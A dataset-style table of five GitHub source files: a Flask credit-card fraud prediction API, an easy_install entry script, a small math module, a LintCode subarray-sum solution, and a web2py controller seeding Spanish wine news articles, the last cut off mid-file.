| blob_id (string, 40 chars) | directory_id (string, 40 chars) | path (string, 2-616 chars) | content_id (string, 40 chars) | detected_licenses (list, 0-69 items) | license_type (2 classes) | repo_name (string, 5-118 chars) | snapshot_id (string, 40 chars) | revision_id (string, 40 chars) | branch_name (string, 4-63 chars) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (220 classes) | src_encoding (30 classes) | language (1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (257 classes) | content (string, 2-10.3M chars) | authors (list, 1 item) | author_id (string, 0-212 chars) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
57a398c163cfc577a5628456d81bc42e45971a36 | 22fc551d4b5c8e4e16683447389a5e4f22136130 | /app.py | 86ae32fae9bc14dc5ebc7daad4c05f290fd9ed8d | [] | no_license | arushi-kalra/creditcard | 988c262f2043c0fbf59ed2c22214362e16db1210 | 0eef904535a483f733ebfb70a336f2020edbfbbc | refs/heads/master | 2023-03-17T20:43:06.006936 | 2020-04-28T16:57:22 | 2020-04-28T16:57:22 | 259,698,336 | 0 | 0 | null | 2021-03-20T03:47:36 | 2020-04-28T16:54:11 | Python | UTF-8 | Python | false | false | 2,664 | py | import os
from flask import Flask, jsonify, request
from flask_restful import Api, Resource
#from model.Train import train_model
import pickle
app = Flask(__name__)
app.config["DEBUG"]=True
api = Api(app)
# Load the four pre-trained classifiers from disk
a = pickle.load(open('decisiontree.pkl', 'rb'))
b = pickle.load(open('logisticreg.pkl', 'rb'))
c = pickle.load(open('randomforest.pkl', 'rb'))
d = pickle.load(open('knn.pkl', 'rb'))
class MakePrediction(Resource):
    @app.route('/predict', methods=['GET'])
    def get():
        # Read the raw query-string parameters
        avg_amt = request.args['Average Amount/transaction/day']
        trans_amt = request.args['Transaction_amount']
        is_dec = request.args['Is declined']
        total_dec = request.args['Total Number of declines/day']
        is_foreign = request.args['isForeignTransaction']
        is_highrisk = request.args['isHighRiskCountry']
        daily_chargeback = request.args['Daily_chargeback_avg_amt']
        six_chbk = request.args['6_month_avg_chbk_amt']
        six_freq = request.args['6-month_chbk_freq']
        # Convert every parameter to float so all four models receive numeric features
        features = [float(avg_amt), float(trans_amt), float(is_dec),
                    float(total_dec), float(is_foreign), float(is_highrisk),
                    float(daily_chargeback), float(six_chbk), float(six_freq)]
        p = a.predict([features])[0]
        q = b.predict([features])[0]
        r = c.predict([features])[0]
        s = d.predict([features])[0]
        # Map each model's 0/1 output to a yes/no label
        predicted_class = 'no' if p == 0 else 'yes'
        predicted_class1 = 'no' if q == 0 else 'yes'
        predicted_class2 = 'no' if r == 0 else 'yes'
        predicted_class3 = 'no' if s == 0 else 'yes'
        return jsonify({
            'Prediction for decision tree': predicted_class,
            'Prediction for logisticreg': predicted_class1,
            'Prediction for randomforest': predicted_class2,
            'Prediction for knn': predicted_class3
        })
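# Illustrative helper (an added sketch, not part of the original service): it
# exercises the /predict route through Flask's built-in test client, assuming
# the four pickled model files are present so the module imports successfully.
def example_request():
    with app.test_client() as client:
        resp = client.get('/predict', query_string={
            'Average Amount/transaction/day': '100',
            'Transaction_amount': '500',
            'Is declined': '0',
            'Total Number of declines/day': '1',
            'isForeignTransaction': '0',
            'isHighRiskCountry': '0',
            'Daily_chargeback_avg_amt': '0',
            '6_month_avg_chbk_amt': '0',
            '6-month_chbk_freq': '0',
        })
        # The handler answers with one yes/no prediction per loaded model
        return resp.get_json()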
if __name__ == '__main__':
    app.run()
| [
"noreply@github.com"
] | arushi-kalra.noreply@github.com |
a44289b24ca2531f005cf3df9251a07338db207a | 92b0de52a55ee964cc09150bb4f5f2a41d1d4dd1 | /venv/bin/easy_install | 117333f024fdb3c0eb1e0f606825c2f4a1f782db | [] | no_license | iopoz/parse_permissions | cb3ad4989c9683198db32b24e36bba52946bc75e | bdc385f9e9a0910d8aad506662b19eb531a1dcf5 | refs/heads/master | 2020-03-16T18:48:07.452942 | 2018-05-10T12:42:28 | 2018-05-10T12:42:28 | 132,887,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | #!/home/iopoz/PycharmProjects/parse_permissions/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==28.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==28.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==28.8.0', 'console_scripts', 'easy_install')()
    )
| [
"2909kev@gmail.com"
] | 2909kev@gmail.com | |
171b69475b3c91f9c0914ff0f0250e3df0dc1140 | 017fa42113615ecf6335fe2384a9af79eb7e21b3 | /session15/my_math.py | 743f0614fdd30b888d64f80a753f5f6ff995e2e6 | [] | no_license | kmartinez33/MIStest | ba1c150fb3e96606408a53b2865f7a5a8c1437af | e661738975133d3d6f570c634c4c01c6876ede95 | refs/heads/master | 2020-09-17T15:41:44.712892 | 2016-11-15T17:31:49 | 2016-11-15T17:31:49 | 67,155,828 | 1 | 2 | null | 2016-10-04T22:09:51 | 2016-09-01T18:23:41 | Python | UTF-8 | Python | false | false | 158 | py | def square(x):
    return x * x
def main():
    # Read a year from stdin (currently unused) and show a sample call
    year = int(input())
    print("test: square(2016) ==", square(2016))
if __name__ == '__main__':
    main()
| [
"kmartinez3@babson.edu"
] | kmartinez3@babson.edu |
4f7885709411c1849cb738566eade86235d66115 | 906ca170744eb2e075b7236814f2137a0283966d | /highFreq/subarraySumClosest.py | 375a0b7543a6c12ebb1706033df97221ba3ac4fe | [] | no_license | logancyang/lintcode | 815f893ee970d760403b409f2adcb11627ce917e | c541fa91b2187391320a8a1dd3e2ca75041b3dab | refs/heads/master | 2021-05-30T14:03:28.795033 | 2015-10-26T19:50:45 | 2015-10-26T19:50:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,259 | py | # subarraySumClosest: http://www.lintcode.com/en/problem/subarray-sum-closest/
class Solution:
"""
@param nums: A list of integers
@return: A list of integers includes the index of the first number
and the index of the last number
"""
# brute force O(n^3)
def subarraySumClosestBrute(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# this part is O(n^3), too slow
for i in xrange(len(nums)):
for j in xrange(i+1, len(nums)):
tmp_sum = sum(nums[i:j+1])
distance = abs(tmp_sum)
if distance < min_dist:
min_dist = distance
result = [i, j]
return result
    def subarraySumClosest(self, nums):
        result = [0, 0]
        if nums is None or len(nums) <= 1:
            return result
        min_dist = float("inf")
        # does allow [i, i], a single element as result
        for i in xrange(len(nums)):
            if abs(nums[i]) < min_dist:
                min_dist = abs(nums[i])
                result = [i, i]
        # compute prefix_sum[i] = sum(nums[:i+1]), O(n)
        accumulator = 0
        # seed with (0, -1) so subarrays that start at index 0 are also covered
        pair_sum_ind = [(0, -1)]
        for i in xrange(len(nums)):
            accumulator += nums[i]
            # accumulator is prefix_sum[i], i inclusive
            pair_sum_ind.append((accumulator, i))
        pair_sum_ind.sort(key=lambda tup: tup[0])
        min_diff = float("inf")
        for i in xrange(1, len(pair_sum_ind)):
            diff = abs(pair_sum_ind[i][0] - pair_sum_ind[i-1][0])
            if diff < min_diff:
                min_diff = diff
                result = [pair_sum_ind[i][1], pair_sum_ind[i-1][1]]
        result.sort()
        # since prefix_sum[j] - prefix_sum[i] refers to subarray sum i+1 to j
        # the smaller index in prefix_sum should + 1
        result[0] = result[0] + 1
        return result
A = [-3, 1, 1, -3, 5]
Sol = Solution()
print Sol.subarraySumClosest(A) | [
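# A small added cross-check (illustrative only): the O(n^3) brute force and the
# O(n log n) prefix-sum version should agree on the absolute value of the best
# subarray sum, even when several subarrays tie on different index pairs.
B = [1, -1, 5]
i1, j1 = Sol.subarraySumClosest(B)
i2, j2 = Sol.subarraySumClosestBrute(B)
print abs(sum(B[i1:j1 + 1])), abs(sum(B[i2:j2 + 1]))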
"logan1934@gmail.com"
] | logan1934@gmail.com |
92154e6aec90e9b30a98b6e59896fc8253b68541 | 07d75948dbf78964a0bef428d95e4ea924dda5df | /controllers/desarrollador2.py | 594916cc76fd33abe9964c31f1492585faebcb74 | [
"LicenseRef-scancode-public-domain"
] | permissive | InstitutoPascal/Vinoteca | bf9c2a5c16349a892e446e6a719e65fc922de1b5 | d93d05a70a9ac5de55c054b632dd8f51f3eacaf3 | refs/heads/master | 2021-01-13T02:42:18.729162 | 2016-12-21T18:48:01 | 2016-12-21T18:48:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109,429 | py | def insertNoticia():
db.noticia.truncate()
from datetime import datetime
fdate='%d/%m/%Y'
try:
db.noticia.insert(titulo='BURBUJAS DE PLACER',fecha=datetime.strptime('16/12/2016',fdate),cuerpo='Entre tantas malas noticias que suelen abundar hay una muy buena; cada vez hay más vinos espumosos para disfrutar. Y qué mejor para celebrar un año difícil que se está despidiendo y recibir con esperanza al 2017 que está por comenzar que una co ...,',copete='Entre tantas malas noticias que suelen abundar hay una muy buena; cada vez hay más vinos espumosos para disfrutar. Y qué mejor para celebrar un año difícil que se está despidiendo y recibir con esperanza al 2017 que está por comenzar que una co ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52654_default_big.jpeg','rb'))
db.noticia.insert(titulo='TINTOS DE VERANO',fecha=datetime.strptime('08/12/2016',fdate),cuerpo='Si bien es una moda importada, como la mayoría adoptada por estas tierras, cuando hay vinos pensados para servirse más frescos de lo habitual, sobresalen en esta época. Porque las altas temperaturas suelen llamar a “otras bebidas”, así ren ...,',copete='Si bien es una moda importada, como la mayoría adoptada por estas tierras, cuando hay vinos pensados para servirse más frescos de lo habitual, sobresalen en esta época. Porque las altas temperaturas suelen llamar a “otras bebidas”, así ren ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52657_default_big.jpeg','rb'))
db.noticia.insert(titulo='OLD VINES= VINOS PARA DESCUBRIR LA HISTORIA DE LA VITICULTURA ARGENTINA',fecha=datetime.strptime('29/11/2016',fdate),cuerpo='Una guía de grandes vinos argentinos elaborados a partir de uvas provenientes de viñas antiguas "Al recorrer los viñedos, degustando las uvas y observando las características de plantas tan viejas y retorcidas por el paso del tiempo, es muy di ...,',copete='Una guía de grandes vinos argentinos elaborados a partir de uvas provenientes de viñas antiguas "Al recorrer los viñedos, degustando las uvas y observando las características de plantas tan viejas y retorcidas por el paso del tiempo, es muy di ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52662_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= 6 BLENDS BLANCOS IDEALES PARA ESTA PRIMAVERA',fecha=datetime.strptime('25/11/2016',fdate),cuerpo='Vinos y Bodegas te recomienda seis etiquetas aptas para diferentes estilos y presupuestos. Descubrí la selección Como se marcaba recientemente desde Vinos & Bodegas iProfesional, tras la tendencia por la cual más bodegas fueron bajándole el pu ...,',copete='Vinos y Bodegas te recomienda seis etiquetas aptas para diferentes estilos y presupuestos. Descubrí la selección Como se marcaba recientemente desde Vinos & Bodegas iProfesional, tras la tendencia por la cual más bodegas fueron bajándole el pu ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52669_default_big.jpeg','rb'))
db.noticia.insert(titulo='LA BODEGA MÁS LINDA DEL MUNDO ES ARGENTINA',fecha=datetime.strptime('16/11/2016',fdate),cuerpo='La red global Great Wine Capitals galardonó a Zuccardi Valle de Uco con el Premio Oro a la mejor Arquitectura y Paisajismo a nivel global Podría haber sido alguna francesa de Burdeos o quizás del Napa Valley californiano, pero para la Great Win ...,',copete='La red global Great Wine Capitals galardonó a Zuccardi Valle de Uco con el Premio Oro a la mejor Arquitectura y Paisajismo a nivel global Podría haber sido alguna francesa de Burdeos o quizás del Napa Valley californiano, pero para la Great Win ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52695_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS IDEALES PARA PASAR DE LOS BLANCOS DULCES A LOS TINTOS Y NO FALLAR EN EL INTENTO',fecha=datetime.strptime('11/11/2016',fdate),cuerpo='Desde Vinos & Bodegas te proponemos una guía de etiquetas para quienes buscan abrirse paso al mundo de los vinos tintos El vino es un gusto adquirido. Por algo las bodegas, en este último tiempo, han ido enfocándose en las neces ...,',copete='Desde Vinos & Bodegas te proponemos una guía de etiquetas para quienes buscan abrirse paso al mundo de los vinos tintos El vino es un gusto adquirido. Por algo las bodegas, en este último tiempo, han ido enfocándose en las neces ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52696_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= 8 MALBEC DE SALTA QUE NO PODÉS DEJAR DE PROBAR',fecha=datetime.strptime('08/11/2016',fdate),cuerpo='Los vinos de los Valles Calchaquíes tienen un carácter inconfundible. En este listado, ocho opciones que no fallan De las 40.000 hectáreas cubiertas con Malbec que se registran en todo el territorio nacional, Salta ostenta apenas el 3% del tota ...,',copete='Los vinos de los Valles Calchaquíes tienen un carácter inconfundible. En este listado, ocho opciones que no fallan De las 40.000 hectáreas cubiertas con Malbec que se registran en todo el territorio nacional, Salta ostenta apenas el 3% del tota ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52705_default_big.jpeg','rb'))
db.noticia.insert(titulo='SPARKLING NIGHTS 2016= UN ENCUENTRO CON LOS MEJORES ESPUMANTES DE LA ARGENTINA',fecha=datetime.strptime('04/11/2016',fdate),cuerpo='La octava edición de la única feria dedicada a esta bebida se realizará del 9 al 11 de noviembre en el Hotel Panamericano. Las entradas ya están a la venta. Del miércoles 9 al viernes 11 de noviembre se llevará a cabo la octava edición de l ...,',copete='La octava edición de la única feria dedicada a esta bebida se realizará del 9 al 11 de noviembre en el Hotel Panamericano. Las entradas ya están a la venta. Del miércoles 9 al viernes 11 de noviembre se llevará a cabo la octava edición de l ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52713_default_big.jpeg','rb'))
db.noticia.insert(titulo='CONOCÉ LOS 9 ESTILOS DEL MALBEC ARGENTINO Y DESCUBRÍ CUÁL TE GUSTA',fecha=datetime.strptime('27/10/2016',fdate),cuerpo='Hay muchos gustos para el Malbec, aunque se los puede resumir en 9 estilos. Chusmealos y fijate cuál es tu preferido. Mucho se habla de Malbec pero poco de los estilos de Malbec. Y a la hora de las copas, es el estilo el que define lo que esconde c ...,',copete='Hay muchos gustos para el Malbec, aunque se los puede resumir en 9 estilos. Chusmealos y fijate cuál es tu preferido. Mucho se habla de Malbec pero poco de los estilos de Malbec. Y a la hora de las copas, es el estilo el que define lo que esconde c ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52719_default_big.jpeg','rb'))
db.noticia.insert(titulo='ALTA GAMA LOW COST= 10 ETIQUETAS QUE VALEN MUCHO MÁS DE LO CUESTAN',fecha=datetime.strptime('25/10/2016',fdate),cuerpo='¿Te gusta darte un gusto con un vino de alta gama pero durante los últimos meses ese placer cuesta más que nunca? Agenda estos vinos y hace valer cada moneda. Mil, dos mil y hasta cinco mil son los precios que te llaman la atención de la gónd ...,',copete='¿Te gusta darte un gusto con un vino de alta gama pero durante los últimos meses ese placer cuesta más que nunca? Agenda estos vinos y hace valer cada moneda. Mil, dos mil y hasta cinco mil son los precios que te llaman la atención de la gónd ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52724_default_big.png','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= CINCO NUEVAS ETIQUETAS PARA MANTENERSE ACTUALIZADO',fecha=datetime.strptime('18/10/2016',fdate),cuerpo='Las novedades continúan llegando a las vinotecas. En esta producción, te presentamos cinco ejemplares tintos= tres Malbec, un Cabernet Franc y un blend Tres Malbec, un Cabernet Franc y un blend forman parte de esta producción de vinos recomenda ...,',copete='Las novedades continúan llegando a las vinotecas. En esta producción, te presentamos cinco ejemplares tintos= tres Malbec, un Cabernet Franc y un blend Tres Malbec, un Cabernet Franc y un blend forman parte de esta producción de vinos recomenda ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52740_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿CANSADO DE LOS TINTOS? PROBÁ ESTOS BLANCOS POR MENOS DE $100 Y DESCUBRÍ SABORES NUEVOS',fecha=datetime.strptime('14/10/2016',fdate),cuerpo='En materia de vinos la originalidad siempre cuesta más. Sin embargo, al apostar por vinos blancos harás diferencia numérica y renovarás el paladar. La góndola se puso picante. Ya sea en el chino, el súper o la vinoteca los precios de casi to ...,',copete='En materia de vinos la originalidad siempre cuesta más. Sin embargo, al apostar por vinos blancos harás diferencia numérica y renovarás el paladar. La góndola se puso picante. Ya sea en el chino, el súper o la vinoteca los precios de casi to ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52743_default_big.jpeg','rb'))
db.noticia.insert(titulo='EN QUÉ VINOS BUSCAR EL SABOR DE LA MADERA Y CÓMO RECONOCERLO',fecha=datetime.strptime('12/10/2016',fdate),cuerpo='Es más fácil que cazar Pokemones, pero igual hace falta tener olfato y gusto. En esta nota, todo lo que hay que saber para encontrarla. El buen vino es frutado. Sin embargo, hay vinos que además de frutas huelen y saben madera. No importa si son ...,',copete='Es más fácil que cazar Pokemones, pero igual hace falta tener olfato y gusto. En esta nota, todo lo que hay que saber para encontrarla. El buen vino es frutado. Sin embargo, hay vinos que además de frutas huelen y saben madera. No importa si son ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52765_default_big.jpeg','rb'))
db.noticia.insert(titulo='CONOCÉ LA DIFERENCIA ENTRE UN VINO MALBEC Y UN CABERNET SAUVIGNON',fecha=datetime.strptime('07/10/2016',fdate),cuerpo='Cuando se empieza a beber vinos una de las primeras preguntas es cómo se perciben las diferencias entre uno y otro. En esta nota, un plan simple para sacar provecho. El juego de las diferencias es simple= uno se concentra en lo que rompe cierta arm ...,',copete='Cuando se empieza a beber vinos una de las primeras preguntas es cómo se perciben las diferencias entre uno y otro. En esta nota, un plan simple para sacar provecho. El juego de las diferencias es simple= uno se concentra en lo que rompe cierta arm ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52767_default_big.jpeg','rb'))
db.noticia.insert(titulo='12 IRRESISTIBLES GRANIZADOS DE VINO',fecha=datetime.strptime('04/10/2016',fdate),cuerpo='¿Granizados con vino? Disfruta de las deliciosas recetas de una de las bebidas favoritas y más vigorizantes para el verano, los granizados. Prepara refrescantes granizados de vino con diferentes variedades, combinados sorprendentes de distintos sab ...,',copete='¿Granizados con vino? Disfruta de las deliciosas recetas de una de las bebidas favoritas y más vigorizantes para el verano, los granizados. Prepara refrescantes granizados de vino con diferentes variedades, combinados sorprendentes de distintos sab ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52771_default_big.jpeg','rb'))
db.noticia.insert(titulo='VINOS RECOMENDADOS= CINCO MALBEC QUE OFRECEN UNA IMBATIBLE RELACIÓN CALIDAD-PRECIO',fecha=datetime.strptime('03/10/2016',fdate),cuerpo='Desde Vinos y Bodegas te proponemos cinco ejemplares que se lucen por ofrecer un plus respecto de su precio Con tantas alternativas de etiquetas reposando en las góndolas y precios en alza, salir de las marcas más masivas y tradicionales resulta ...,',copete='Desde Vinos y Bodegas te proponemos cinco ejemplares que se lucen por ofrecer un plus respecto de su precio Con tantas alternativas de etiquetas reposando en las góndolas y precios en alza, salir de las marcas más masivas y tradicionales resulta ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52774_default_big.jpeg','rb'))
db.noticia.insert(titulo='SIETE COSAS QUE HAY QUE SABER DECIR PARA IMPRESIONAR AL HABLAR DE VINOS',fecha=datetime.strptime('30/09/2016',fdate),cuerpo='El arte de parecer especialista tiene sus trucos. Si querés saber cuáles son para practicarlos o bien para detectarlos en otros, pegale una leída a esta nota. Cuando las cosas se dicen con familiaridad, en algún punto se demuestra conocimie ...,',copete='El arte de parecer especialista tiene sus trucos. Si querés saber cuáles son para practicarlos o bien para detectarlos en otros, pegale una leída a esta nota. Cuando las cosas se dicen con familiaridad, en algún punto se demuestra conocimie ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52779_default_big.jpeg','rb'))
db.noticia.insert(titulo='LA PAREJA PERFECTA= 6 VINOS RECOMENDADOS QUE CONJUGAN MALBEC Y CABERNET FRANC',fecha=datetime.strptime('29/09/2016',fdate),cuerpo='La variedad estrella de la Argentina y esta otra cepa que está en pleno ascenso, cuando se conjugan, suelen alumbrar vinos complejos, elegantes y muy bebibles. Un listado imperdible En los últimos años, la variedad Cabernet Franc se ha consolid ...,',copete='La variedad estrella de la Argentina y esta otra cepa que está en pleno ascenso, cuando se conjugan, suelen alumbrar vinos complejos, elegantes y muy bebibles. Un listado imperdible En los últimos años, la variedad Cabernet Franc se ha consolid ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52785_default_big.png','rb'))
db.noticia.insert(titulo='ESOS “RAROS VINOS NUEVOS”= LAS CEPAS NO TRADICIONALES DESPEGAN EN LA ARGENTINA',fecha=datetime.strptime('27/09/2016',fdate),cuerpo='En la Argentina no todo es Malbec. Las bodegas que vienen trabajando con variedades poco o nada conocidas son protagonistas de esta tendencia Hasta hace unos años, muy pocas bodegas se atrevían a lanzar vinos realmente diferentes y por fuera de ...,',copete='En la Argentina no todo es Malbec. Las bodegas que vienen trabajando con variedades poco o nada conocidas son protagonistas de esta tendencia Hasta hace unos años, muy pocas bodegas se atrevían a lanzar vinos realmente diferentes y por fuera de ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52787_default_big.jpeg','rb'))
db.noticia.insert(titulo='CUÁLES SON LOS 10 VINOS ARGENTINOS MÁS CAROS EN EL MUNDO',fecha=datetime.strptime('23/09/2016',fdate),cuerpo='El buscador de bebidas alcohólicas online Wine Searcher publicó el ranking de las etiquetas locales que alcanzan un precio más alto a nivel global Wine Searcher, el "google" de vinos de mayor relevancia global, dio a conocer días atrás la lis ...,',copete='El buscador de bebidas alcohólicas online Wine Searcher publicó el ranking de las etiquetas locales que alcanzan un precio más alto a nivel global Wine Searcher, el "google" de vinos de mayor relevancia global, dio a conocer días atrás la lis ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52798_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿HACÉS UN ASADO?, ACOMPAÑALO CON VINOS DE HASTA 180 PESOS',fecha=datetime.strptime('20/09/2016',fdate),cuerpo='Si pensás darle la bienvenida a la primavera con un asado de alto vuelo, agendá estos vinos y date un gusto gourmet. Hace años que los argentinos no esperamos con tanta ansiedad este cambio de estación. A pesar de su invierno helado, no muy de ...,',copete='Si pensás darle la bienvenida a la primavera con un asado de alto vuelo, agendá estos vinos y date un gusto gourmet. Hace años que los argentinos no esperamos con tanta ansiedad este cambio de estación. A pesar de su invierno helado, no muy de ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52799_default_big.jpeg','rb'))
db.noticia.insert(titulo='10 CONSEJOS PARA COMPRAR VINO Y NO CLAVARSE EN EL INTENTO',fecha=datetime.strptime('13/09/2016',fdate),cuerpo='A la hora de comprar vino, si no querés que te metan el perro, seguí los consejos. Seguro alguna vez compraste una botella que prometía todo y resultó ser un perno. Si bien es raro que un vino esté malo, puede pasar si no se toman ciertos reca ...,',copete='A la hora de comprar vino, si no querés que te metan el perro, seguí los consejos. Seguro alguna vez compraste una botella que prometía todo y resultó ser un perno. Si bien es raro que un vino esté malo, puede pasar si no se toman ciertos reca ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52862_default_big.jpeg','rb'))
db.noticia.insert(titulo='UN MALBEC ARGENTINO, ELEGIDO ENTRE LOS MEJORES DEL MUNDO',fecha=datetime.strptime('02/09/2016',fdate),cuerpo='El Pyros Barrel Selected Malbec 2014, elaborado en San Juan, recibió el premio a la mejor etiqueta producida fuera de los viñedos europeos en el Japan Wine Challenge 2016 Un vino de San Juan fue galardonado en la categoría al mejor vino del Nuevo ...,',copete='El Pyros Barrel Selected Malbec 2014, elaborado en San Juan, recibió el premio a la mejor etiqueta producida fuera de los viñedos europeos en el Japan Wine Challenge 2016 Un vino de San Juan fue galardonado en la categoría al mejor vino del Nuevo ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_52880_default_big.jpeg','rb'))
db.noticia.insert(titulo='DE QUÉ HABLAMOS CUANDO HABLAMOS DE TERROIR Y EN QUÉ VINOS RECONOCERLO',fecha=datetime.strptime('30/08/2016',fdate),cuerpo='Cada vez más se invoca al terroir para explicar los vinos argentinos. Los consumidores no tienen claro qué es, ni para qué sirve, ni cómo emplear el concepto. Guía práctica para no iniciados. En los últimos cinco años el concepto de terroir ...,',copete='Cada vez más se invoca al terroir para explicar los vinos argentinos. Los consumidores no tienen claro qué es, ni para qué sirve, ni cómo emplear el concepto. Guía práctica para no iniciados. En los últimos cinco años el concepto de terroir ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53071_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿QUÉ QUIERE DECIR “LA AÑADA” DE UN VINO?',fecha=datetime.strptime('29/08/2016',fdate),cuerpo='En el mundo del vino hay tantos tecnicismos, que a veces, es difícil recordar el significado de muchos de los términos que vemos en la etiqueta de una botella. En este caso, no vamos a fijarnos en las palabras sino en los números. ¿Qué quiere de ...,',copete='En el mundo del vino hay tantos tecnicismos, que a veces, es difícil recordar el significado de muchos de los términos que vemos en la etiqueta de una botella. En este caso, no vamos a fijarnos en las palabras sino en los números. ¿Qué quiere de ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53078_default_big.jpeg','rb'))
db.noticia.insert(titulo='7 PREGUNTAS SIN RESPUESTA QUE TODO BEBEDOR DE VINOS SE HACE ALGUNA VEZ',fecha=datetime.strptime('25/08/2016',fdate),cuerpo='El amor al vino arranca por una curiosidad genuina. Sólo que algunas de esas preguntas originales nunca tienen respuesta. Saber o no saber de vinos es una cuestión de grado. Para una inmensa mayoría pronunciar bien Cabernet Sauvignon es suficie ...,',copete='El amor al vino arranca por una curiosidad genuina. Sólo que algunas de esas preguntas originales nunca tienen respuesta. Saber o no saber de vinos es una cuestión de grado. Para una inmensa mayoría pronunciar bien Cabernet Sauvignon es suficie ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53117_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿EL MUNDO PODRÍA QUEDARSE SIN CHAMPAGNE?',fecha=datetime.strptime('23/08/2016',fdate),cuerpo='Por clima extremo, los productores del espumante más famoso tienen que usar sus reservas para cumplir con las demandas de 2016. Primero nos enteramos de la escasez de cacao que podría llevar al aumento del precio del chocolate, y ahora llega otra ...,',copete='Por clima extremo, los productores del espumante más famoso tienen que usar sus reservas para cumplir con las demandas de 2016. Primero nos enteramos de la escasez de cacao que podría llevar al aumento del precio del chocolate, y ahora llega otra ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53313_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS 21 MEJORES RESTAURANTES CON DESCORCHE PARA LLEVAR TU VINO FAVORITO',fecha=datetime.strptime('19/08/2016',fdate),cuerpo='Si te gusta comer y beber bien pero te asusta el precio de las cartas, la mejor opción está en estos restaurantes que ofrecen descorche. Comer en buenos restaurantes es garantía de gasto, primero por los vinos y luego por los platos. ¿Pero qu� ...,',copete='Si te gusta comer y beber bien pero te asusta el precio de las cartas, la mejor opción está en estos restaurantes que ofrecen descorche. Comer en buenos restaurantes es garantía de gasto, primero por los vinos y luego por los platos. ¿Pero qu� ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53403_default_big.png','rb'))
db.noticia.insert(titulo='VINO Y YOGA, RAZONES PARA COMBINARLOS',fecha=datetime.strptime('17/08/2016',fdate),cuerpo='La obtención de una mente serena y un cuerpo fuerte, flexible y saludable, ¿son los objetivos que te habías planteado alcanzar? Imagínate que aparecen en forma conjunta, sencilla y natural. ¡El yoga! Los beneficios del yoga son reconocidos en to ...,',copete='La obtención de una mente serena y un cuerpo fuerte, flexible y saludable, ¿son los objetivos que te habías planteado alcanzar? Imagínate que aparecen en forma conjunta, sencilla y natural. ¡El yoga! Los beneficios del yoga son reconocidos en to ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53463_default_big.jpeg','rb'))
